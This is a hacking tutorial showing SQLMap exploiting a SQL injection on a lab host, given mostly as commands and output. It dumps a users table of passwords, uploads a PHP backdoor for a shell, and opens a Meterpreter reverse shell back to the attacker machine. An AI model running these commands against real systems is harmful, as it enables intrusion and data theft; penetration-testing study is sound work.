How to: SQLMap (dump and destroy)
SQLMap is the tool to automate SQL Injection vulnerability exploitation. This tool is very popular to exploit the SQL Injection vulnerability. While most of web hacker enthusiast knew about this tool to gather information and retrieves the tables information, i try to share this information about the powerful of SQLMap rather than just as “a database dumper tool”.
I will separate this in 3 section, as a fingerprinter (we already knew this), as an enumerator (of course), and as a destroyer (hmm..?!). Check it out.
Fingerprinting
root@bt:/pentest/database/sqlmap# ./sqlmap.py --url "http://192.168.1.102/vid.php?id=818" sqlmap/0.9-dev - automatic SQL injection and database takeover tool http://sqlmap.sourceforge.net [*] starting at: 22:26:52 [22:26:52] [INFO] using '/pentest/database/sqlmap/output/192.168.1.102/session' as session file [22:26:52] [INFO] resuming match ratio '0.972' from session file [22:26:52] [INFO] resuming injection point 'GET' from session file [22:26:52] [INFO] resuming injection parameter 'id' from session file [22:26:52] [INFO] resuming injection type 'numeric' from session file [22:26:52] [INFO] resuming 0 number of parenthesis from session file [22:26:52] [INFO] resuming back-end DBMS 'mysql 5' from session file [22:26:52] [INFO] resuming remote absolute path of temporary files directory 'C:/WINDOWS/Temp' from session file [22:26:52] [INFO] testing connection to the target url [22:26:52] [INFO] testing for parenthesis on injectable parameter [22:26:52] [INFO] the back-end DBMS is MySQL web server operating system: Windows web application technology: Apache 2.2.12, PHP 5.3.0 back-end DBMS: MySQL 5 [*] shutting down at: 22:26:52
Yes, we knew this at all. Dump the database engine, the version, and the operating system information.
Enumerate Database
root@bt:/pentest/database/sqlmap# ./sqlmap.py --url "http://192.168.1.102/vid.php?id=818" --dbs --------------------------------------------------------------------- [22:28:41] [INFO] fetching database names [22:28:41] [INFO] fetching number of databases [22:28:41] [INFO] retrieved: 6 [22:28:41] [INFO] retrieved: information_schema [22:28:44] [INFO] retrieved: cdcol [22:28:45] [INFO] retrieved: mysql [22:28:46] [INFO] retrieved: phpmyadmin [22:28:47] [INFO] retrieved: test [22:28:48] [INFO] retrieved: webappdb available databases [6]: [*] cdcol [*] information_schema [*] mysql [*] phpmyadmin [*] test [*] webappdb
Dump the database, yes..SQLMap always do the great stuff!
Enumerate tables
root@bt:/pentest/database/sqlmap# ./sqlmap.py --url "http://192.168.1.102/vid.php?id=818" -D webappdb --tables [22:32:32] [INFO] fetching tables for database 'webappdb' [22:32:32] [INFO] fetching number of tables for database 'webappdb' [22:32:32] [INFO] retrieved: 2 [22:32:33] [INFO] retrieved: guestbook [22:32:34] [INFO] retrieved: users Database: webappdb [2 tables] +-----------+ | guestbook | | users | +-----------+
Dump the tables
[22:36:54] [INFO] fetching columns for table 'users' on database 'webappdb' [22:36:54] [INFO] fetching number of columns for table 'users' on database 'webappdb' [22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.1.102/session': 4 [22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.1.102/session': id [22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.1.102/session': name [22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.1.102/session': password [22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.1.102/session': country [22:36:54] [INFO] fetching entries for table 'users' on database 'webappdb' [22:36:54] [INFO] fetching number of entries for table 'users' on database 'webappdb' [22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.1.102/session': 3 [22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.1.102/session': ID [22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.1.102/session': 1 [22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.1.102/session': admin [22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.1.102/session': 123456 [22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.1.102/session': ID [22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.1.102/session': 2 [22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.1.102/session': secret [22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.1.102/session': password [22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.1.102/session': SG [22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.1.102/session': 3 [22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.1.102/session': backup [22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.1.102/session': backup12 Database: webappdb Table: users [3 entries] +---------+----+--------+----------+ | country | id | name | password | +---------+----+--------+----------+ | ID | 1 | admin | 123456 | | ID | 2 | secret | password | | SG | 3 | backup | backup12 | +---------+----+--------+----------+ [22:36:54] [INFO] Table 'webappdb.users' dumped to CSV file '/pentest/database/sqlmap/output/192.168.1.102/dump/webappdb/users.csv' [22:36:54] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/192.168.1.102' [*] shutting down at: 22:36:54
SQLMap do a great job so far ? Next, take over the system!!
Remote Command Execution
root@bt:/pentest/database/sqlmap#./sqlmap.py --url "http://192.168.1.102/vid.php?id=818" --os-shell
[22:51:25] [INFO] trying to upload the uploader agent
which web application language does the web server support?
[1] ASP (default)
[2] PHP
[3] JSP
>2
[22:51:27] [WARNING] unable to retrieve the web server document root
please provide the web server document root [C:/xampp/htdocs/]:
[22:51:28] [WARNING] unable to retrieve any web server path
please provide any additional web server full path to try to upload the agent [C:/xampp/htdocs/]:
[22:51:28] [INFO] the uploader agent has been successfully uploaded on 'C:/xampp/htdocs/' ('http://192.168.1.102:80/tmpuduwd.php')
[22:51:28] [INFO] the backdoor has probably been successfully uploaded on 'C:/xampp/htdocs/', go with your browser to 'http://192.168.1.102:80//tmpbpjbr.php' and enjoy it!
[22:51:28] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
>2 ipconfig
do you want to retrieve the command standard output? [Y/n/a] a
command standard output:
---
Windows IP Configuration
Ethernet adapter Local Area Connection 2:
Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 192.168.1.102
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.1.1
---
os-shell>
The Metasploit’s Meterpreter over SQL Injection
root@bt:/pentest/database/sqlmap# ./sqlmap.py --url "http://192.168.1.102/vid.php?id=818" --msf-path=/opt/metasploit3/msf3 --os-pwn
This time, SQLMap will upload an php file contain shell_exec in order to execute arbitrary command to the remote system via php. After uploaded, SQLMap will trigger the msfpayload (Metasploit Payload) to build “portable executable” meterpreter backdoor. It will be encoded and uploaded via php shell.
When uploaded, SQLMap will trigger “Metasploit listener” called Multi/handler and waiting for the “portable exe backdoor” to be executed. After it executed, the meterpreter shell will come up ?
I will skip some information here, because it is too long to be dropped here.
—-the process before this line was creating the php shell and upload to document root—–
I will skip some information here, because it is too long to be dropped here.
—-the process before this line was creating the php shell and upload to document root—–
[22:57:05] [INFO] creating Metasploit Framework 3 payload stager which connection type do you want to use? [1] Reverse TCP: Connect back from the database host to this machine (default) [2] Reverse TCP: Try to connect back from the database host to this machine, on all ports between the specified and 65535 [3] Bind TCP: Listen on the database host for a connection >1 which is the local address? [192.168.1.100] which local port number do you want to use? [31503] which payload do you want to use? [1] Meterpreter (default) [2] Shell [3] VNC > 1 which payload encoding do you want to use? [1] No Encoder [2] Alpha2 Alphanumeric Mixedcase Encoder [3] Alpha2 Alphanumeric Uppercase Encoder [4] Avoid UTF8/tolower [5] Call+4 Dword XOR Encoder [6] Single-byte XOR Countdown Encoder [7] Variable-length Fnstenv/mov Dword XOR Encoder [8] Polymorphic Jump/Call XOR Additive Feedback Encoder [9] Non-Alpha Encoder [10] Non-Upper Encoder [11] Polymorphic XOR Additive Feedback Encoder (default) [12] Alpha2 Alphanumeric Unicode Mixedcase Encoder [13] Alpha2 Alphanumeric Unicode Uppercase Encoder > 11 [22:57:46] [INFO] creation in progress ................ done [22:58:03] [INFO] compression in progress . done [22:58:04] [INFO] uploading payload stager to 'C:/xampp/htdocs/tmpmtonj.exe' [22:58:04] [INFO] running Metasploit Framework 3 command line interface locally, wait.. [*] Please wait while we load the module tree... [*] Started reverse handler on 192.168.1.100:31503 [*] Starting the payload handler... [22:58:27] [INFO] running Metasploit Framework 3 payload stager remotely, wait.. [*] Sending stage (748544 bytes) to 192.168.1.102 [*] Meterpreter session 1 opened (192.168.1.100:31503 -> 192.168.1.102:2561) meterpreter> Loading extension espia...success. meterpreter> Loading extension incognito...success. meterpreter> Loading extension priv...success. meterpreter> Loading extension sniffer...success. meterpreter> Computer: XP_FDCC OS : Windows XP (Build 2600, Service Pack 3). Arch : x86 Language: en_US meterpreter> Server username: NT AUTHORITYSYSTEM meterpreter> meterpreter> shell Process 3128 created. Channel 1 created. Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:>
OS Pwned!